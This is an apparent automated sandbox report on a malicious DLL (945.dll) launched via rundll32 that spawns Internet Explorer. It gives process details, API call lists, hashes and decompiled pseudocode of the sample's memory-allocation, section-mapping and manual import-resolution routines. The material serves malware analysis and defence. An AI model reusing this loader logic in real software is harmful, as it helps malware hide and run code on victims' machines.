                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:19
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:22
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                              Imagebase:0x7ff64d950000
                                                                                                              File size:823560 bytes
                                                                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:23
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2
                                                                                                              Imagebase:0x13d0000
                                                                                                              File size:822536 bytes
                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:25
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2
                                                                                                              Imagebase:0x13d0000
                                                                                                              File size:822536 bytes
                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis


                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6E24DD28), ref: 6E24E395
                                                                                                                • VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6E24DD8A), ref: 6E24E3CC
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6E24E42C
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E462
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E24E2B7), ref: 6E24E567
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E24E2B7), ref: 6E24E58E
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7), ref: 6E24E65B
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7,?), ref: 6E24E6B1
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E6CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574235972-0
                                                                                                                • Opcode ID: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction ID: 863db9c4489dca3519704cf4dbbf7eebc93fc39de8d13dbb7e2a8b2ec6e0c9f5
                                                                                                                • Opcode Fuzzy Hash: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction Fuzzy Hash: 6ED15D72105701DFEB25EF58C888A71F7A6FF88310B194198ED299F25AD7B0A811EB74
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E6E1F1ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _FILETIME* _v16;
                                                                                                                				short _v60;
                                                                                                                				struct _FILETIME* _t14;
                                                                                                                				intOrPtr _t15;
                                                                                                                				long _t18;
                                                                                                                				void* _t19;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr _t31;
                                                                                                                				long _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t31 = __edx;
                                                                                                                				_t14 =  &_v16;
                                                                                                                				GetSystemTimeAsFileTime(_t14);
                                                                                                                				_push(0x192);
                                                                                                                				_push(0x54d38000);
                                                                                                                				_push(_v12);
                                                                                                                				_push(_v16);
                                                                                                                				L6E1F2130();
                                                                                                                				_push(_t14);
                                                                                                                				_v16 = _t14;
                                                                                                                				_t15 =  *0x6e1f4144;
                                                                                                                				_push(_t15 + 0x6e1f505e);
                                                                                                                				_push(_t15 + 0x6e1f5054);
                                                                                                                				_push(0x16);
                                                                                                                				_push( &_v60);
                                                                                                                				_v12 = _t31;
                                                                                                                				L6E1F212A();
                                                                                                                				_t18 = _a4;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t18 = 0x1000;
                                                                                                                				}
                                                                                                                				_t19 = CreateFileMappingW(0xffffffff, 0x6e1f4148, 4, 0, _t18,  &_v60); // executed
                                                                                                                				_t34 = _t19;
                                                                                                                				if(_t34 == 0) {
                                                                                                                					_t32 = GetLastError();
                                                                                                                				} else {
                                                                                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                						if(_t22 == 0) {
                                                                                                                							_t32 = GetLastError();
                                                                                                                							if(_t32 != 0) {
                                                                                                                								goto L9;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							 *_a8 = _t34;
                                                                                                                							 *_a12 = _t22;
                                                                                                                							_t32 = 0;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t32 = 2;
                                                                                                                						L9:
                                                                                                                						CloseHandle(_t34);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t32;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?,?), ref: 6E1F1AE7
                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1F1AFD
                                                                                                                • _snwprintf.NTDLL ref: 6E1F1B22
                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,6E1F4148,00000004,00000000,?,?), ref: 6E1F1B47
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B5E
                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1F1B72
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B8A
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A), ref: 6E1F1B93
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1724014008-0
                                                                                                                • Opcode ID: 2f43388934aeb5e78839ff90ebc82ce8ad820876296e1a1b22a72e0aefceb890
                                                                                                                • Instruction ID: 196c37f7f7638380828ce3608de25c2963ff39fe568ce6a73e9410946051a6fd
                                                                                                                • Opcode Fuzzy Hash: 2f43388934aeb5e78839ff90ebc82ce8ad820876296e1a1b22a72e0aefceb890
                                                                                                                • Instruction Fuzzy Hash: 0C21A7B2600108FFDB00AFE4DC88E9E77F9EB55354F218025F616E7141E6309987ABE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::locale::locale.LIBCPMTD ref: 6E2117EB
                                                                                                                  • Part of subcall function 6E213B70: std::locale::_Init.LIBCPMT ref: 6E213B79
                                                                                                                • _setlocale.LIBCMT ref: 6E2117FE
                                                                                                                  • Part of subcall function 6E21C33C: _mbstowcs_s.LIBCMT ref: 6E21C362
                                                                                                                  • Part of subcall function 6E21C33C: __invoke_watson.LIBCMT ref: 6E21C37D
                                                                                                                  • Part of subcall function 6E21C33C: __calloc_crt.LIBCMT ref: 6E21C387
                                                                                                                • SetConsoleOutputCP.KERNELBASE(000004E3), ref: 6E21181E
                                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,6E24CB58,000008C6,?,?,00000006,00000000), ref: 6E211850
                                                                                                                • SetConsoleCP.KERNELBASE(00000000), ref: 6E2118D9
                                                                                                                • _malloc.LIBCMT ref: 6E2118E4
                                                                                                                • GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6E211A5B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 1969868346-0
                                                                                                                • Opcode ID: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction ID: ebceaccab04a5794dd9ef913fa29cfff9e66d670fb69624f53b39fd53676240f
                                                                                                                • Opcode Fuzzy Hash: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction Fuzzy Hash: 0D42487190461CDFCB19EFA8D988B9CBBF3FB5A309F10911AE525AB248E7706545CF20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E6E1F1996(intOrPtr* __eax, void** _a4) {
                                                                                                                				int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				int _v28;
                                                                                                                				int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				int _v40;
                                                                                                                				int _v44;
                                                                                                                				void* _v48;
                                                                                                                				void* __esi;
                                                                                                                				long _t34;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				intOrPtr* _t48;
                                                                                                                
                                                                                                                				_t48 = __eax;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                				_v16 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v48 = 0x18;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0x40;
                                                                                                                				_v40 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                				if(_t34 < 0) {
                                                                                                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                				} else {
                                                                                                                					 *_t48 = _v16;
                                                                                                                					_t39 = E6E1F1A44(_t48,  &_v12); // executed
                                                                                                                					_t47 = _t39;
                                                                                                                					if(_t47 != 0) {
                                                                                                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                					} else {
                                                                                                                						memset(_v12, 0, _v24);
                                                                                                                						 *_a4 = _v12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t47;
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1F19F3
                                                                                                                  • Part of subcall function 6E1F1A44: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1F1A08,00000002,00000000,?,?,00000000,?,?,6E1F1A08,00000002), ref: 6E1F1A71
                                                                                                                • memset.NTDLL ref: 6E1F1A15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                • Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                                                                                • Instruction ID: 842ca67e5a2255276b21364cefc13e71ea2cda8668dd1fe99411d5d02e234caf
                                                                                                                • Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                                                                                • Instruction Fuzzy Hash: 4921F7B6E00209AFDB01DFE9C8849DEFBF9EF48354F104429E615F3211D731AA499BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1BAC(void* __edi, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				_Unknown_base(*)()** _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed short _v24;
                                                                                                                				struct HINSTANCE__* _v28;
                                                                                                                				intOrPtr _t43;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				intOrPtr _t46;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr _t50;
                                                                                                                				signed short _t51;
                                                                                                                				_Unknown_base(*)()* _t53;
                                                                                                                				CHAR* _t54;
                                                                                                                				_Unknown_base(*)()* _t55;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t59;
                                                                                                                				_Unknown_base(*)()* _t60;
                                                                                                                				intOrPtr _t61;
                                                                                                                				intOrPtr _t65;
                                                                                                                				signed int _t68;
                                                                                                                				void* _t69;
                                                                                                                				CHAR* _t71;
                                                                                                                				signed short* _t73;
                                                                                                                
                                                                                                                				_t69 = __edi;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_t59 =  *0x6e1f4140;
                                                                                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                				if(_t43 != 0) {
                                                                                                                					_t45 = _t43 + __edi;
                                                                                                                					_v12 = _t45;
                                                                                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                					if(_t46 != 0) {
                                                                                                                						while(1) {
                                                                                                                							_t71 = _t46 + _t69;
                                                                                                                							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                							_v28 = _t47;
                                                                                                                							if(_t47 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                							_t49 = _v12;
                                                                                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                							_t50 =  *_t49;
                                                                                                                							if(_t50 != 0) {
                                                                                                                								L6:
                                                                                                                								_t73 = _t50 + _t69;
                                                                                                                								_v16 = _t61 + _t69;
                                                                                                                								while(1) {
                                                                                                                									_t51 =  *_t73;
                                                                                                                									if(_t51 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									if(__eflags < 0) {
                                                                                                                										__eflags = _t51 - _t69;
                                                                                                                										if(_t51 < _t69) {
                                                                                                                											L12:
                                                                                                                											_t21 =  &_v8;
                                                                                                                											 *_t21 = _v8 & 0x00000000;
                                                                                                                											__eflags =  *_t21;
                                                                                                                											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                										} else {
                                                                                                                											_t65 = _a4;
                                                                                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                												goto L12;
                                                                                                                											} else {
                                                                                                                												goto L11;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t51 = _t51 + _t69;
                                                                                                                										L11:
                                                                                                                										_v8 = _t51;
                                                                                                                									}
                                                                                                                									_t53 = _v8;
                                                                                                                									__eflags = _t53;
                                                                                                                									if(_t53 == 0) {
                                                                                                                										_t54 = _v24 & 0x0000ffff;
                                                                                                                									} else {
                                                                                                                										_t54 = _t53 + 2;
                                                                                                                									}
                                                                                                                									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                									__eflags = _t55;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_v20 = _t59 - 0x63699b44;
                                                                                                                									} else {
                                                                                                                										_t68 = _v8;
                                                                                                                										__eflags = _t68;
                                                                                                                										if(_t68 != 0) {
                                                                                                                											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                										}
                                                                                                                										 *_v16 = _t55;
                                                                                                                										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                										_t73 = _t73 + _t58;
                                                                                                                										_t32 =  &_v16;
                                                                                                                										 *_t32 = _v16 + _t58;
                                                                                                                										__eflags =  *_t32;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t50 = _t61;
                                                                                                                								if(_t61 != 0) {
                                                                                                                									goto L6;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L23:
                                                                                                                							_v12 = _v12 + 0x14;
                                                                                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                							if(_t46 != 0) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                							}
                                                                                                                							L26:
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t60 = _t59 + 0x9c9664bb;
                                                                                                                						__eflags = _t60;
                                                                                                                						_v20 = _t60;
                                                                                                                						goto L26;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L27:
                                                                                                                				return _v20;
                                                                                                                			}





























                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1F1BE4
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 6E1F1C56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574300362-0
                                                                                                                • Opcode ID: d2aafd8585bf9c9d48add595451825aa6c3d154cb38d96f00be3f0c224b0b14a
                                                                                                                • Instruction ID: d0bf840a3467e20b6f62afd3030980eae8a15a2e59d563eabb9382c24ecb00ba
                                                                                                                • Opcode Fuzzy Hash: d2aafd8585bf9c9d48add595451825aa6c3d154cb38d96f00be3f0c224b0b14a
                                                                                                                • Instruction Fuzzy Hash: BE315DB1B0421ADFDB44CF99C890AADB7F5BF15310FA14069D851E7241E770DA86EB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E6E1F1A44(void** __esi, PVOID* _a4) {
                                                                                                                				long _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				long _t13;
                                                                                                                
                                                                                                                				_v16 = 0;
                                                                                                                				asm("stosd");
                                                                                                                				_v8 = 0;
                                                                                                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                				if(_t13 < 0) {
                                                                                                                					_push(_t13);
                                                                                                                					return __esi[6]();
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1F1A08,00000002,00000000,?,?,00000000,?,?,6E1F1A08,00000002), ref: 6E1F1A71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: SectionView
                                                                                                                • String ID:
                                                                                                                • API String ID: 1323581903-0
                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                • Instruction ID: b309d729e885ca2fd2a038ef3d8cb5a9684487045621024fa797228ddaba49b9
                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                • Instruction Fuzzy Hash: 2BF082B5A0020CFFEB119FA5CC84C9FBBFCEB44394B104939F152E1090D2309E489A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E6E1F1456(char _a4) {
                                                                                                                				long _v8;
                                                                                                                				struct _SYSTEMTIME _v24;
                                                                                                                				char _v48;
                                                                                                                				void* __edi;
                                                                                                                				long _t20;
                                                                                                                				int _t22;
                                                                                                                				long _t25;
                                                                                                                				long _t26;
                                                                                                                				long _t30;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t38;
                                                                                                                				intOrPtr _t43;
                                                                                                                				signed int _t44;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				void* _t54;
                                                                                                                				intOrPtr* _t55;
                                                                                                                
                                                                                                                				_t20 = E6E1F1F0E();
                                                                                                                				_v8 = _t20;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					return _t20;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					GetSystemTime( &_v24);
                                                                                                                					_t22 = SwitchToThread();
                                                                                                                					asm("cdq");
                                                                                                                					_t44 = 9;
                                                                                                                					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                                                                                					_t25 = E6E1F1717(0, _t51); // executed
                                                                                                                					_v8 = _t25;
                                                                                                                					Sleep(_t51 << 5); // executed
                                                                                                                					_t26 = _v8;
                                                                                                                				} while (_t26 == 0xc);
                                                                                                                				if(_t26 != 0) {
                                                                                                                					L18:
                                                                                                                					return _t26;
                                                                                                                				}
                                                                                                                				if(_a4 != 0) {
                                                                                                                					L11:
                                                                                                                					_push(0);
                                                                                                                					_t54 = E6E1F155C(E6E1F1E55,  &_v48);
                                                                                                                					if(_t54 == 0) {
                                                                                                                						_v8 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                                                                                						_v8 = _t30;
                                                                                                                						if(_t30 == 0) {
                                                                                                                							GetExitCodeThread(_t54,  &_v8);
                                                                                                                						}
                                                                                                                						CloseHandle(_t54);
                                                                                                                					}
                                                                                                                					_t26 = _v8;
                                                                                                                					if(_t26 == 0xffffffff) {
                                                                                                                						_t26 = GetLastError();
                                                                                                                					}
                                                                                                                					goto L18;
                                                                                                                				}
                                                                                                                				if(E6E1F1F87(_t44,  &_a4) != 0) {
                                                                                                                					 *0x6e1f4138 = 0;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t43 = _a4;
                                                                                                                				_t55 = __imp__GetLongPathNameW;
                                                                                                                				_t36 =  *_t55(_t43, 0, 0); // executed
                                                                                                                				_t48 = _t36;
                                                                                                                				if(_t48 == 0) {
                                                                                                                					L9:
                                                                                                                					 *0x6e1f4138 = _t43;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t14 = _t48 + 2; // 0x2
                                                                                                                				_t38 = E6E1F2009(_t48 + _t14);
                                                                                                                				 *0x6e1f4138 = _t38;
                                                                                                                				if(_t38 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				 *_t55(_t43, _t38, _t48); // executed
                                                                                                                				E6E1F201E(_t43);
                                                                                                                				goto L11;
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F1F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F1462,74B063F0), ref: 6E1F1F1D
                                                                                                                  • Part of subcall function 6E1F1F0E: GetVersion.KERNEL32 ref: 6E1F1F2C
                                                                                                                  • Part of subcall function 6E1F1F0E: GetCurrentProcessId.KERNEL32 ref: 6E1F1F48
                                                                                                                  • Part of subcall function 6E1F1F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F1F61
                                                                                                                • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E1F1474
                                                                                                                • SwitchToThread.KERNEL32 ref: 6E1F147A
                                                                                                                  • Part of subcall function 6E1F1717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1F176D
                                                                                                                  • Part of subcall function 6E1F1717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1F1833
                                                                                                                • Sleep.KERNELBASE(00000000,00000000), ref: 6E1F149B
                                                                                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1F14D0
                                                                                                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1F14EE
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E1F1526
                                                                                                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1F1538
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6E1F153F
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 6E1F1547
                                                                                                                • GetLastError.KERNEL32 ref: 6E1F1554
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1962885430-0
                                                                                                                • Opcode ID: 9dd13fe30c2fff2d6a01356df4afe2b07a74786f32ae7ae02da0e2288041ae8f
                                                                                                                • Instruction ID: 6e2b89b3a155a1fbb4bfbbe08ad96213a5056964876ad6cbefb0b1858b6bdd4a
                                                                                                                • Opcode Fuzzy Hash: 9dd13fe30c2fff2d6a01356df4afe2b07a74786f32ae7ae02da0e2288041ae8f
                                                                                                                • Instruction Fuzzy Hash: 3131A4F2A00515EBCB01DBE59C4899E77FC9F86361B214512E916D3101E734CA87FBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

